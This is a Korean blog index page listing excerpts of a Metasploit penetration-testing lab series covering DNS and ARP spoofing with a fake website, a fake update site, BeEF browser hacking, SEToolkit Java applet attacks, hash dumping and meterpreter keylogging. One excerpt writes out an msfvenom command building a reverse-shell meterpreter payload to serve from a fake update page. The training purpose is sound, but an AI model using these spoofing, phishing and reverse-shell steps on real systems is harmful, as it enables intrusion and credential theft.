전체 글 썸네일형 리스트형 metasploit 20. DNS + ARP Spoofing + Fake Web site ***************************************************************************************[실습] Fake Site 구성(제한 시간: 30분) DNS Spoofing/Arp Spoofing : ettercap+Fake Web Site : SETookit(실습2)+문자메세지/메일 보내기: SETookit (실습 시스템)Victim system : windows 7(192.168.20.202)Attack system : KaliLinux(192.168.20.50)Router : firewall.example.com(192.168.20.100) (windows 7 system) 결과 확인http://www.google.com -> http://.. 더보기 metasploit 19. Fake Update Site 구축 [추가적인 실습] ■ Fake Update Site 구축 (KaliLinux) ① 클라이언트에 설치할 payload 생성[TERM1] 첫번째 터미널# cd /var/www/html # msfvenom \-p windows/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 \-f exe \-o payload.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPay.. 더보기 metasploit 18. BeFF + MSF 브라우저 해킹 원격 쉘 얻기 [추가적인 실습] - 2015년 12월30일 현재 정상적으로 실습이 되지 않는다. BeFF + MSF = 통합BeEF와 MSF 사용하여 브라우저 해킹을 시도하고 원격 쉘을 얻는 과정을 이해해 보자. ■ 사용시스템- KaliLinux- Windows 7(Chrome 브라우저 사용) (windows 7) ■ 점검사항윈도우7 방화벽 설정을 내린다.Java 보안 설정에 192.168.20.50192.168.20.50:8080 사이트를 신뢰할 수 있는 사이트로 등록한다. (kaliLinux) ① BeEF 설정 점검 및 필요하면 변경[TERM1] 첫번째 터미널# vi /usr/share/beef-xss/config.yaml ..... (중략) ...../metasploit 더보기 metasploit 17. 웹 브라우저 해킹 BeFF [실습] 칼리 리눅스 사용하기(웹 브라우저 해킹) WEB Attack : XSS(Cross Side Script)BeEF(비프) XSS 프레임워크: 사용자 권한 획득 BeEF(Browser Exploit Framwork) 사용자 웹 브라우저로 웹페이지를 읽을 때 자바 스크립트 형태로 동작하며, 사용자 PC의 정보 수집 부터 메타 스플로잇 모듈을 이용한 광범위한 공격까지 가능한 도구이다. XSS(Cross Side Script) 취약점웹에서 사용하는 클라이언트 스크립트인 자바스크립트, VB 스크립트, CSS, 에이젝스(Ajax)등을 통해 스크립트에 접근한 사용자들에게 특정한 액션을 일으키게 하는 것을 의미한다.특정한 액셕이라는 것은 악성 코드 유포나, 윔, 바이러스 배포등이 보통의 목적이다. 또한 사용자 .. 더보기 metasploit 16. Java Applet Attack SE Tool Kit 실행(Fake Google WEB Site 구성) - Java Applet Attack(악성 프로그램 유포)(KarlLinux)# setoolkit Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 Select from the menu:.. 더보기 metasploit 15. SET(Social Engineering Tech.) SET(Social Engineering Tech.) ■ 사용시스템- Kali Linux- Windows 7 패스트 트랙(Fasttrack): 자동 공격 도구메타스포로잇 모듈을 사용한다. 이 도구는 메타스포로잇에 기반을 두고 있고 공격 기법 중 하나인 Autopwn 공격은 내장되어 있는 기능 중 엔맵(nmap)을 통해 네트워크 스캐닝 작업을 하여 대상 시스템을 검색하고, 그에 대한 운영체제, 포트, IP 주소를 분석하며 그에 해당하는 모든 취약점을 자동화 스크립트로 공격한다.칼리리눅스에서는 SET(사회 공학 기법)에 통합되었다. SET(Social Engineering Tech., 사회 공학적 공격 기법)사회공학이란 컴퓨터 보안에서 인간 상호작용의 깊은 신뢰를 바탕으로 사람들을 속여 정상 보안 절차를 깨.. 더보기 metasploit 14. 윈도우즈 환경에서 Metasploit 다운로드 [실습] 윈도우즈 환경에서 Metasploit 다운로드 하여 운영하는 방법윈도우즈(window2008)에 Metasploit 다운로드 하고 설치해 보자. MSF interface : (ㄱ) (TUI) console(msfconsole CMD) (ㄴ) (TUI) CMD(msfcli CMD) (ㄷ) (GUI) Armitage, msfgui, msfweb Armitage 도구와 msfguiArmitage는 Raphael Mudge가 개발한 GUI 기반을 둔 도구로 자동 공격 도구(점검 도구)인 메타스플로잇의 도구 중 하나로 포함돼 있다.스캔을 통해 해당 서비스에 적합한 공격을 골라내 선택할 수 있고, 옵션들도 자동으로 입력되기 때문에 점검자 입장에서는 많은 고민을 하지 않아도 되는 아주 편리한 도구이다. Ar.. 더보기 metasploit 13. 메타스플로잇 업데이트(msfupdate CMD) [실습] 메타스플로잇 업데이트(msfupdate CMD) 이 작업은 진행하지 않는다. -> 시간이 오래 걸린다. 만약 이 작업을 진행한다면 OS snapshot을 뜨고 작업한다.-> 나중에 에러 생기는 경우를 대비한다. (업데이트 하다가 문제가 발생경우가 많이 있다.) msfupdate 명령어를 통해 업데이트 하는 경우 metasploit-framework 관련 된 파일이 not found 에러메세지를 발생하면서 실행이 되지 않는다면 아래와 같은 절차를 통해 업데이트가 가능하다. ■ (2016년 01월06일 : KaliLinux 2.0 - kali scna repository 사용하는 경우) (ㄱ) 미러 사이트 확인 # curl –sI http://http.kali.org/README (ㄴ) /etc/a.. 더보기 metasploit 12. password the hash(hash dump) [실습] password the hash(hash dump) ■ 사용시스템 - KaliLinux - windows 2008 (windows 2008) (선수작업) 윈도우 2008 사용자 (EX: soldesk)의 암호를 쉬운 암호로 변경한다. (기존 암호) ==> (새로운 암호) 123 시작 > 관리도구 > 로컬 보안 정책 보안 설정 > 계정 정책 > 암호 정책 > "암호는 복잡성을 만족해야 함" 부분이 "사용 안 함"으로 설정 되어 있는지 확인 시작 > 관리도구 > 컴퓨터 관리 > 로컬 사용자 및 그룹 > 사용자 > soldesk 사용자를 선택하고 오른쪽 마우스를 클릭 암호 설정 > 계속 > 새암호(EX: 123) (KaliLinux) # netstat -an | grep :5432 # service .. 더보기 metasploit 11. 키보드 스니핑과 스크린샷 [실습] 키보드 스니핑과 스크린샷 ■ 사용 시스템- KaliLinux- Windows 2008 meterpreter의 getdesktop과 키 스니핑에 대해서 테스트해 보자.관련 명령어들 enumdesktops 접근 가능한 테스크톱과 윈도우 스테이션 전체 목록을 확인 getdesktop 현재 meterpreter 세션으로 작업하고 있는 사용자 시스템의 현재 테스크 톱 확인 setdesktop 현재 meterpreter 세션 테스크톱에서 다른 데스크톱 스테이션으로 변경 keyscan_start 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 시작 keyscan_stop 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 종료 keyscan_dump meterpreter 데스크톱 세션의 키보드 동.. 더보기 이전 1 ··· 14 15 16 17 18 19 20 ··· 39 다음
